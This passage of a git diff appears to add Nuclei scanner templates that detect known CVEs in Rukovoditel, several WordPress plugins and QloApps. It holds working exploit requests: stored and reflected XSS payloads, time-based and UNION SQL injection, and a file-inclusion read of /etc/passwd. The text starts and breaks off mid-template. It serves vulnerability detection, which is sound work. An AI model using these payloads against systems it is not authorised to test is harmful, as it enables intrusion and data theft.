name="fields_configuration[default_value]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[is_unique]" + + 0 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[unique_error_msg]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="required_message" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip_item_page" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access_template" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[5]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[4]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="notes" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf-- + + cookie-reuse: true + redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44951.yaml b/http/cves/2022/CVE-2022-44951.yaml new file mode 100644 index 0000000000..b88e86034d --- /dev/null +++ b/http/cves/2022/CVE-2022-44951.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-44951 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Form tab function at /index.php?module=entities/forms&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/11 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44951 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 5.4 + cve-id: CVE-2022-44951 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description= + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44952.yaml b/http/cves/2022/CVE-2022-44952.yaml new file mode 100644 index 0000000000..868fa826c6 --- /dev/null +++ b/http/cves/2022/CVE-2022-44952.yaml @@ -0,0 +1,142 @@ +id: CVE-2022-44952 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in /index.php?module=configuration/application. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Copyright Text field after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/9 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44952 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 5.4 + cve-id: CVE-2022-44952 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMh2HSjWbM7zJjWOA + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="form_session_token" + + {{nonce}} + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_NAME]" + + Test + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]" + + test + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="APP_LOGO"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_LOGO]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_LOGO_URL]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="APP_FAVICON"; filename="" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_FAVICON]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_LANGUAGE]" + + english.php + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_SKIN]" + + + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_TIMEZONE]" + + America/New_York + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]" + + 10 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]" + + m/d/Y + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]" + + m/d/Y H:i + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]" + + 2/./* + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]" + + 0 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]" + + 0 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA + Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]" + + 0 + ------WebKitFormBoundaryMh2HSjWbM7zJjWOA-- + + - | + @timeout: 5s + GET /index.php?module=dashboard/ HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_4 == 200' + - 'contains(content_type_4, "text/html")' + - 'contains(body_4, "")' + - 'contains(body_4, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml new file mode 100644 index 0000000000..9cbdadc655 --- /dev/null +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -0,0 +1,46 @@ +id: CVE-2023-0514 + +info: + name: Membership Database <= 1.0 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Membership Database before 1.0 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/c6cc400a-9bfb-417d-9206-5582a49d0f05 + - https://wordpress.org/plugins/member-database/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-0514 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-0514 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,membership-database,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "Member Database")' + condition: and diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml new file mode 100644 index 0000000000..8d9da20898 --- /dev/null +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -0,0 +1,36 @@ +id: CVE-2023-1730 + +info: + name: SupportCandy < 3.1.5 - Unauthenticated SQL Injection + author: theamanrawat + severity: critical + description: | + The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks. + remediation: Fixed in version 3.1.5 + reference: + - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7 + - https://wordpress.org/plugins/supportcandy/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1730 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-1730 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2023,sqli,wpscan,wordpress,supportcandy,unauth + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cookie: wpsc_guest_login_auth={"email":"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu"} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "supportcandy")' + condition: and diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml new file mode 100644 index 0000000000..35d0e2d486 --- /dev/null +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -0,0 +1,43 @@ +id: CVE-2023-1835 + +info: + name: Ninja Forms < 3.6.22 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/b5fc223c-5ec0-44b2-b2f6-b35f9942d341 + - https://wordpress.org/plugins/ninja-forms/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1835 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-1835 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "Ninja Forms")' + condition: and diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml new file mode 100644 index 0000000000..ee72893fa9 --- /dev/null +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-1890 + +info: + name: Tablesome < 1.0.9 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d + - https://wordpress.org/plugins/tablesome/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-1890 + remediation: Fixed in version 1.0.9. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-1890 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tablesome + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "tablesome")' + condition: and diff --git a/http/cves/2023/CVE-2023-2023.yaml b/http/cves/2023/CVE-2023-2023.yaml new file mode 100644 index 0000000000..7b89d30332 --- /dev/null +++ b/http/cves/2023/CVE-2023-2023.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-2023 + +info: + name: Custom 404 Pro < 3.7.3 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 3.7.3 + reference: + - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317 + - https://wordpress.org/plugins/custom-404-pro/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2023 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-2023 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/admin.php?page=c4p-main&s={{randstr}}%22%20style=animation-name:rotation%20onanimationstart=alert(document.domain)// HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "onanimationstart=alert(document.domain)//")' + - 'contains(body_2, "Custom 404 Pro")' + condition: and diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml new file mode 100644 index 0000000000..229a2214db --- /dev/null +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-2252 + +info: + name: Directorist < 7.5.4 - Local File Inclusion + author: r3Y3r53 + severity: medium + description: | + Directorist before 7.5.4 is susceptible to Local File Inclusion as it does not validate the file parameter when importing CSV files. + remediation: Fixed in version 7.5.4 + reference: + - https://wpscan.com/vulnerability/9da6eede-10d0-4609-8b97-4a5d38fa8e69 + - https://wordpress.org/plugins/directorist/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2252 + metadata: + max-request: 2 + verified: true + tags: cve,cve2023,lfi,directorist,wordpress,wp-plugin,wp,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml new file mode 100644 index 0000000000..d61fec1bf7 --- /dev/null +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -0,0 +1,46 @@ +id: CVE-2023-2272 + +info: + name: Tiempo.com <= 0.1.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Tiempo.com before 0.1.2 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/dba60216-2753-40b7-8f2b-6caeba684b2e + - https://wordpress.org/plugins/tiempocom/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-2272 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-2272 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tiempocom + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + page=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "Tiempo")' + condition: and diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml new file mode 100644 index 0000000000..ce6d92452d --- /dev/null +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-30256 + +info: + name: Webkul QloApps 1.5.2 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file. + reference: + - https://github.com/webkul/hotelcommerce + - http://packetstormsecurity.com/files/172542/Webkul-Qloapps-1.5.2-Cross-Site-Scripting.html + - https://github.com/ahrixia/CVE-2023-30256 + - https://nvd.nist.gov/vuln/detail/CVE-2023-30256 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-30256 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,webkul-qloapps,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "xss onfocus=alert(document.domain) autofocus= xss" + - "hasConfirmation" + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml new file mode 100644 index 0000000000..3a90d33596 --- /dev/null +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-30777 + +info: + name: Advanced Custom Fields < 6.1.6 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/95ded80f-a47b-411e-bd17-050439bf565f + - https://wordpress.org/plugins/advanced-custom-fields/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-30777 + remediation: Fixed in version 6.1.6. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-30777 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "onanimationstart=alert(document.domain)//")' + - 'contains(body_2, "Advanced Custom Fields")' + condition: and diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml new file mode 100644 index 0000000000..eb0ef67c53 --- /dev/null +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -0,0 +1,47 @@ +id: CVE-2023-36287 + +info: + name: Webkul QloApps 1.6.0 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter. + reference: + - https://github.com/webkul/hotelcommerce + - https://flashy-lemonade-192.notion.site/Cross-site-scripting-via-controller-parameter-in-QloApps-1-6-0-97e409ce164f40d195b625b9bf719900 + - https://nvd.nist.gov/vuln/detail/CVE-2023-36287 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-36287 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,webkul-qloapps,unauth + +http: + - raw: + - | + POST / HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + controller=change-currency9405'-alert(document.domain)-'&id_currency= + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'change-currency9405'-alert(document.domain)-'';" + - "customizationIdMessage" + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml new file mode 100644 index 0000000000..d7051ea8a8 --- /dev/null +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -0,0 +1,50 @@ +id: CVE-2023-36289 + +info: + name: Webkul QloApps 1.6.0 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter. + reference: + - https://github.com/webkul/hotelcommerce + - https://flashy-lemonade-192.notion.site/Cross-site-scripting-in-POST-Request-via-email_create-and-back-parameter-in-QloApps-1-6-0-e05548203d744daf9047d82fc94b19b7 + - https://nvd.nist.gov/vuln/detail/CVE-2023-36289 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-36289 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,webkul-qloapps,unauth + +variables: + email: "{{randstr}}@{{rand_base(5)}}.com" + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + SubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}"%20onmouseover=alert(document.domain)%20y=&token={{randstr}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'onmouseover=alert(document.domain)' + - 'hasConfirmation' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/exposed-panels/qdpm-login-panel.yaml b/http/exposed-panels/qdpm-login-panel.yaml new file mode 100644 index 0000000000..ca2afd9f4f --- /dev/null +++ b/http/exposed-panels/qdpm-login-panel.yaml @@ -0,0 +1,35 @@ +id: qdpm-login-panel + +info: + name: qdPM Login Panel + author: theamanrawat + severity: info + metadata: + verified: "true" + shodan-query: http.favicon.hash:762074255 + tags: panel,qdpm,login + +http: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/index.php/login' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'qdPM' + - '/index.php/login/restorePassword' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml new file mode 100644 index 0000000000..a4b713cde8 --- /dev/null +++ b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml @@ -0,0 +1,44 @@ +id: contus-video-gallery-sqli + +info: + name: WordPress Video Gallery <= 2.8 - SQL Injection + author: theamanrawat + severity: critical + description: | + The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection. + reference: + - https://wpscan.com/vulnerability/b625aee5-8fd1-4f3e-9a9c-d41bdec13243 + - https://wordpress.org/plugins/photo-gallery/ + remediation: Fixed in version 1.6.3 + metadata: + verified: true + tags: sqli,wpscan,wordpress,contus-video-gallery,unauth + +variables: + num: '999999999' + +http: + - raw: + - | + @timeout: 10s + POST /wp-admin/admin-ajax.php?image_id=123 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=GalleryBox&filter_tag=1)" union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5 join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5({{num}}))a20 join (select 2)a21 join (select 2)a22 join (select 2)a23-- - + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "c8c605999f3d8352d7bb792cf3fdb25b" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml new file mode 100644 index 0000000000..599bc56d83 --- /dev/null +++ b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml @@ -0,0 +1,30 @@ +id: leaguemanager-sql-injection + +info: + name: LeagueManager <= 3.9.11 - SQL Injection + author: theamanrawat + severity: critical + description: | + The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection. + reference: + - https://wpscan.com/vulnerability/f3be48f5-ae2c-4e27-80ca-664829b8fba3 + - https://wordpress.org/plugins/leaguemanager/ + metadata: + verified: true + tags: sqli,wp,wp-plugin,wordpress,leaguemanager,unauth + +http: + - raw: + - | + @timeout: 10s + GET /?season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&team_id=1&match_day=1&team_id=1 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "LeagueManagerAjaxL10n")' + condition: and diff --git a/http/vulnerabilities/wordpress/notificationx-sqli.yaml b/http/vulnerabilities/wordpress/notificationx-sqli.yaml new file mode 100644 index 0000000000..7a6a6c809f --- /dev/null +++ b/http/vulnerabilities/wordpress/notificationx-sqli.yaml @@ -0,0 +1,43 @@ +id: notificationx-sqli + +info: + name: NotificationX < 2.3.12 - SQL Injection + author: theamanrawat + severity: high + description: | + The plugin does not validate and escape the id parameter in its notificationx/v1/notification REST endpoint before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL Injection attacks. + reference: + - https://wpscan.com/vulnerability/d1480717-726d-4be2-95cb-1007a3f010bb + - https://wordpress.org/plugins/notificationx/ + remediation: Fixed in version 2.3.12 + metadata: + verified: true + tags: sqli,wp,wp-plugin,wordpress,notificationx-sql-injection + +http: + - raw: + - | + GET /wp-json/ HTTP/1.1 + Host: 